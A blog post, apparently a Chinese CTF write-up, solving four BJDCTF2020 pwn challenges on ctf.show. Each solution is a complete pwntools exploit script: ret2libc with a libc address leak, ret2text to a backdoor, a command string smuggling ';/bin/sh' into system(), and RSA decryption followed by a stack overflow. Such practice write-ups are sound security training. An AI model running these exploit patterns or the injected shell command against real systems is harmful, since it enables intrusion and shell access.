PWN-PRACTICE-CTFSHOW-4

最新推荐文章于 2024-04-15 18:47:29 发布
最新推荐文章于 2024-04-15 18:47:29 发布
阅读量789 收藏 1
点赞数
分类专栏: Pwn-CTFSHOW 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122519353
版权
本文详细介绍了BJDCTF2020中四个PWN挑战赛题目的解决方法,包括babyrouter的ret2libc技巧、babystack的ret2text方法、dizzy的命令行多命令执行特性利用以及encryptdestack的RSA解密与栈溢出攻击。
摘要由CSDN通过智能技术生成

PWN-PRACTICE-CTFSHOW-4

BJDCTF2020-babyrouter

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28034)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4006AD
pop_rdi=0x400733
ret=0x4004c9

io.recvuntil("tell me u story!\n")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
binsh=libc_base+0x18cd57

io.recvuntil("tell me u story!\n")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)

io.interactive()

BJDCTF2020-babystack

栈溢出,ret2text

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28177)
elf=ELF("./pwn1")

io.sendlineafter("the length of your name:\n","-1")

backdoor=0x4006E6
ret=0x400561
io.recvuntil("u name?\n")
payload="a"*0x10+"b"*8+p64(ret)+p64(backdoor)
io.sendline(payload)

io.interactive()

BJDCTF2020-dizzy

利用linux系统命令行多命令执行的特点

Linux 系统可以在一个命令行上执行多个命令:
	; --如果命令被分号(;)所分隔,那么命令会连续的执行下去,就算是错误的命令也会继续执行后面的命令
	&& --如果命令被 && 所分隔,那么命令也会一直执行下去,但是中间有错误的命令就不会执行后面的命令,没错就继续执行直至命令执行完为止
	|| --如果命令被双竖线 || 所分隔,那么一遇到可以执行成功的命令就会停止执行后面的命令,而不管后面的命令是否正确。如果执行到错误的命令就是继续执行后一个命令,直到遇到执行到正确的命令或命令执行完为止

构造输入,使之能在进行加0x1BF52后得到"PvvN| 1S S0 GREAT!;/bin/sh\x00",分号前的命令会失败,但仍然会执行system("/bin/sh\x00")

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28161)
elf=ELF("./pwn1")

s="PvvN| 1S S0 GREAT!;/bin/sh".ljust(80,"\x00")
arr=[]
for i in range(0,len(s),4):
    tmp=hex(ord(s[i+3]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 2]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 1]))[2:].zfill(2)
    tmp+= hex(ord(s[i + 0]))[2:].zfill(2)
    arr.append(int(tmp,16))
for i in range(len(arr)):
    arr[i]-=0x1BF52

#io.recvuntil("Let's play this!")
for i in range(20):
	io.sendline(str(arr[i]))

io.interactive()

BJDCTF2020-encryptde stack

程序打印随机数作为RSA密文,解RSA得到明文,循环20次,然后栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
import libnum
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28163)
elf=ELF("./pwn1")

n=94576960329497431
e=65537
p=261571747
q=361571773
phin=(p-1)*(q-1)
d=libnum.invmod(e,phin)

io.recvuntil("to encrypt it\n")
for i in range(20):
	c=int(io.recvuntil("\n")[:-1])
	m=pow(c,d,n)
	io.sendline(str(m))
	io.recvline()

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
vuln_addr=0x400B30
pop_rdi=0x40095a
ret=0x4006e1

io.recvuntil("inpu1t you name:\n")
payload="a"*0x48+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
binsh=libc_base+0x18cd57

io.recvuntil("inpu1t you name:\n")
payload="a"*0x48+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(vuln_addr)
io.sendline(payload)

io.interactive()
P1umH0
关注
专栏目录
ctfshow pwn4
qq_39980610的博客
08-22 717
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 490
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
ctfshow pwn 04
A2247328295的博客
04-13 565
接下来在第一个黄框位置下断点和printf函数处下断点,该断点为了查看canary的值,然后在printf()函数处下断点,该断点是为了查看canary在printf()函数处偏移,然后直接run。格式化字符串漏洞简单来说就是,由于printf函数不安全的使用造成的,%n是不安全的,还有printf(a)直接输出字符串也是不安全的,我们可以通过该漏洞获取canary泄露。黄框的地方是重点,第一个黄框为canary的插入,第二个为printf()函数的调用,第三个为canary的检验。
CTFShow pwn04
Mintind的博客
12-03 966
CTFShow pwn04 解题记录
CTFshow-PWN-Test_your_nc(pwn0-pwn4
最新发布
Welcome To Myon'Blog !
04-15 1301
连上,等它程序执行完你可以直接来到 shell 界面执行命令,获取 flag。
[Bugku CTF——Pwn] pwn4
Y_peak的博客
03-22 585
[Bugku CTF——Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadget就好 思路 将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来 exploit from pwn import * #p = process('./pwn4_') p = remote('114.67.246.176',15541) pop_rdi = 0x00
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
ctfshow pwn
zip471642048的博客
06-04 532
ctfshow pwn系列
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9851
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6345
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3648
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
XCTF-简单题-pwn-004
Morphy_Amo的博客
12-09 685
CTF-pwn-新手区-004
CTFshow web4 详解
lzu_lfl的博客
10-15 2936
日志写码getshell
CTFshow卷王杯 | just pwn
rencvn的划水
03-06 699
开学期间太无聊了,和室友一起刷题,由于之前底子不好,卡住了一段时间,写写记录一下。 检查文件保护机制 开启了relro,pie和canary 将程序扔进ida里分析 找到main函数,想进行f5反汇编,但是报错无法逆出反汇编 错误具体原因出现在0x1257,我们跟进查看 这里时call rdx,在看上面的汇编 lea rdx,[rbp+buf] 实际上是将我们写如的内容进行call的操作,这里我在使用gdb调试的时候发现 栈可执行,并且栈上存在/bin/sh字符串 ...
ctfshow-新手杯-crypto4新手村难度-wp
mxx307的博客
10-09 1625
ctfshow-新手杯-crypto4新手村难度-wp 先贴一贴国庆放假摆得太厉害,忘记了还有比赛,放完后赶紧回来补一补。
Pwn_CTFShow_01
Trick的博客
11-08 858
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值